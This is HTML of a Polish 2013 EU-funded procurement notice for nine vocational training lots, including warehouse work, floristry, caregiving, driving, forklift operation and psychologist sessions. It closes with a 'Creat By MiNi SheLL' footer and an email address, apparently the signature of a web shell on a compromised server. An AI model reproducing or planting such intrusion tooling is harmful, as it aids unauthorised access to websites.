<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Magazynier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników - 6
Minimalna ilość godzin - 45, 
Tematyka Zajęć / Cel szkolenia: 
Celem szkolenia jest przyuczenie do wykonywania pracy na stanowisku magazyniera oraz nadzorującego pracę magazynu poprzez nabycie umiejętności w zakresie: organizacji pracy 
w magazynach, poznanie podstaw zagospodarowania magazynu i technologii magazynowania, prowadzenia dokumentacji magazynowej, obiegu dokumentów i towarów w magazynie, obsługi komputera w zakresie podstawowym oraz obsługi programów magazynowych. Gospodarka magazynowa - zagadnienia ogólne, Procesy techniczne w gospodarce magazynowej, Zagospodarowanie magazynu I technologia magazynowania, Prowadzenie dokumentacji; obieg dokumentów i towarów, Zasady i technologia magazynowania, Zapasy cel I funkcje zapasów, Zagadnienia organizacyjne gospodarki magazynowej, Personel magazynowy. Prawa i obowiązki, Inwentaryzacja w magazynach, Wdrażanie systemów GHP oraz HACCP, Zapoznanie z obsługą komputera od podstaw, Zasady gospodarki magazynowej oraz obsługa programów WF - Mag I Symfonia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzedawca z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników - 1
Minimalna ilość godzin - 70, 
Tematyka zajęć/Cel szkolenia:
Celem kursu jest nabycie wiedzy i umiejętności w zawodzie sprzedawca wraz z obsługą kasy fiskalnej. Kurs umożliwi słuchaczom zdobycie odpowiedniego zakresu wiadomości niezbędnych w pracy na stanowisku sprzedawca wraz z obsługą kasy fiskalnej. Organizacja działalności handlowej, Towar jako przedmiot handlu, Sztuka sprzedawania, Dokumentacja Handlowa, Wystawianie rachunków i faktur, Etyka zawodu sprzedawcy, Kultura obsługi klienta, Obsługa kas fiskalnych, Ćwiczenia z zakresu sprzedaży. I OBSŁUGA KASY FISKALNEJ:- część teoretyczna i część praktyczna z następujących zagadnień:- podstawowe akty prawne związane z zastosowaniem kas fiskalnych- budowa, zasady działania oraz podział urządzeń fiskalnych i terminali płatniczych. II Komunikowanie się (e-mail, wysyłanie i odczytywanie wiadomości, zarządzanie pocztą elektroniczną, korzystanie z internetu). III Obsługa programu do prowadzenia małej księgowości. Prowadzenie podatkowej księgi przychodów i rozchodów, innych obowiązujących ewidencji podatkowych oraz rozliczenia publicznoprawne w działalności gospodarczej prowadzonej przez osoby fizyczne. Prowadzenie działalności gospodarczej w Polsce. Podatki i inne daniny publiczne w działalności gospodarczej. Prowadzenie podatkowej księgi przychodów i rozchodów. Ewidencje obowiązujące przy prowadzeniu podatkowej księgi przychodów i rozchodów. Rozliczenie wynagrodzeń pracowników oraz z tytułu umów cywilnoprawnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bukieciarz/Florysta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 2
Minimalna ilość godzin - 132, 
Tematyka zajęć/Cel szkolenia
Teoretyczne i praktyczne przygotowanie słuchaczy do wykonywania kompozycji roślinnych o różnej tematyce. Anatomia i fizjologia roślin, Asortyment roślin ozdobnych, Sposoby utrwalania materiału roślinnego, Główne aspekty uprawy roślin ozdobnych Narzędzia i środki techniczne, Artykuły dekoracyjne, Podstawowe zasady wykonywania kompozycji, Style w kompozycjach, Ekonomika handlu, Wiązanki okolicznościowe, Kompozycje w naczyniach, Florystyka ślubna, Florystyka żałobna, Dekoracje okolicznościowe, Dekoracje z roślin doniczkowych, Kompozycje z roślin suchych, sztucznych i preparowanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opiekun osób starszych, chorych i dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 2
Minimalna ilość godzin - 120, 
Tematyka zajęć/Cel szkolenia
Celem kursu jest przygotowanie słuchacza do pracy w zawodzie opiekuna środowiskowego, wyposażenie słuchaczy w rzetelną wiedzę teoretyczną i praktyczną niezbędną do pełnienia roli osoby pierwszego kontaktu z ludźmi niesamodzielnymi i dziećmi. Psychospołeczne uwarunkowania pracy z podopiecznym, rozwiązywanie problemów podopiecznego, opieka nad podopiecznym. Podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka, praca z dzieckiem upośledzonym, zasady i metody wychowania dziecka. Uczestnictwo w zajęciach praktycznych daje słuchaczom możliwość odniesienia wiedzy zdobywanej na kursie do problemów praktycznych, z jakimi spotykają się w instytucji oraz środowiskach podopiecznych. W trakcie zajęć słuchacze ćwiczą metody postępowania z osobami niepełnosprawnymi, obłożnie chorymi, starymi, chorymi psychicznie i dziećmi oraz zdobywają umiejętności przydatne w wykonywaniu zawodu opiekuna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prawo jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 4
Minimalna ilość godzin - 30, 
Tematyka zajęć/Cel szkolenia
Celem kursu na prawo jazdy kat. B jest przygotowanie osób ubiegających się o prawo jazdy kat. B do kierowania tymi pojazdami w sposób nie zagrażający bezpieczeństwu lub porządkowi ruchu drogowego oraz bardzo dobre przygotowanie osoby szkolonej do egzaminu. Szkolenie teoretyczne obejmie nauczanie z zakresu przepisów ruchu drogowego, techniki kierowania, ogólnej budowy i obsługi pojazdu, pierwszej pomocy, jak i omówienie zachowań na skrzyżowaniu. Szkolenie praktyczne obejmuje: zapoznanie się z wyposażeniem pojazdu, jazdę w ruchu drogowym (na terenie zabudowanym i poza zabudowanym), jazdę na placu manewrowym. Wykonawca zobowiązuje się do ustalenia terminu oraz pokrycia kosztów pierwszego egzaminy państwowego, zarówno praktycznego, jak i teoretycznego w Wojewódzkim Ośrodku Ruchu Drogowego oraz do przekazania do Urzędu kopii wpłat za egzamin oraz kopii dokumentów potwierdzających datę wyznaczonego terminu egzaminu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kosmetyczka z elementami wizażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 2
Minimalna ilość godzin - 90, 
Tematyka zajęć/Cel szkolenia
Specyfika pracy w gabinecie kosmetycznym, cechy i obowiązki kosmetyczki, urządzenie gabinetu kosmetycznego, przepisy BHP. Budowa i funkcje skóry, charakterystyka cery normalnej, charakterystyka cery suchej, charakterystyka cery  tłustej, charakterystyka cery  mieszanej, charakterystyka cery starczej. Warunki przystąpienia do zabiegu kosmetycznego, stanowisko pracy, wygląd kosmetyczki, wywiad z klientem. Karta pacjenta. Demakijaż oczu, techniki zmywania. Demakijaż twarzy, szyi, dekoltu, techniki zmywania. Pielęgnacja okolic oczu. Środki do pielęgnowania brwi i rzęs. Środki do farbowania brwi i rzęs, farbowanie brwi i rzęs (technika nakładania). Korekta kształtu brwi. Masaż twarzy, szyi, dekoltu, kremy i olejki do masażu. Schorzenia skóry najczęściej spotykane w gabinecie kosmetycznym. Teoretyczne podstawy rozróżniania typów skóry. Warsztat pracy wizażysty. Makijaż korekcyjny. Sposoby retuszowania niedoskonałości skóry. Makijaż dzienny. Zasady makijażu wieczorowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Obsługa wózka jezdniowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 4
Minimalna ilość godzin - 60, 
Tematyka zajęć/Cel szkolenia
Szkolenie obejmuje zakres materiału zgodny z programem dla osób ubiegających się  o uprawnienia kierowcy wózków widłowych obejmujące wszystkie typy wózków  wraz z bezpieczną wymianą butli gazowych w tychże wózkach. Celem Szkolenia jest nabycie przez uczestników wiedzy teoretycznej i praktycznej, niezbędnej do obsługi wózków jezdniowych z napędem silnikowym oraz bezpiecznej wymiany butli gazowych w wózkach. Typy stosowanych wózków jezdniowych, Budowa wózka, Czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami, Czynności kierowcy w czasie pracy wózkami, Wiadomości z zakresu ładunkoznawstwa, Wiadomości z zakresu BHP, Wiadomości o dozorze technicznym, Informacje na temat bezpiecznej wymiany butli gazowych w wózkach jezdniowych, Praktyczna nauka jazdy oraz bezpieczna wymiana butli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Technolog robót wykończeniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 13
Minimalna ilość godzin - 230, 
Tematyka zajęć/Cel szkolenia
Celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do wykonywania budowlanych prac wykończeniowych. Podczas uczestnictwa w kursie słuchacze nabędą wiedzę i umiejętności m.in. z zakresu: prac budowlanych z zastosowaniem płyt kartonowo-gipsowych; stosowania tynków szlachetnych; montażu sufitów podwieszanych; kładzenia posadzek z płyt ceramicznych i granitowo-marmurowych; wykończeniowych prac podłogowych; malowania i prac dekoracyjnych; przepisów bhp; technologii robót przy budowie lekkich przegród i ścian działowych; układania posadzek. Słuchacze zostaną przygotowani nie tylko do bezpośredniego wykonywania prac, lecz również do ich zaplanowania, zorganizowania, oceny jakości wykonania i naprawy usterek oraz rozliczenia materiałowo-finansowego. Pozwoli to absolwentom prowadzić własną działalność gospodarczą w zakresie usług budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Spotkania indywidualne z psychologiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 19
Minimalna ilość godzin - po 1,3 godz. z każdym uczestnikiem  osobno, 
Tematyka zajęć/Cel szkolenia
Diagnoza obecnej sytuacji uczestnika projektu. Trening rozwiązywania problemów w trudnych sytuacjach międzyludzkich, odkrycie swoich mocnych stron, potencjałów sprzyjających lepszemu radzeniu sobie w życiu zawodowym i osobistym. Nabycie umiejętności odmawiania, wyrażanie swojego zdania, przyjmowania krytyki, zarządzanie stresem, wzmocnienie pewności siebie. Nakreślenie planu rozwoju dla uczestnika projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com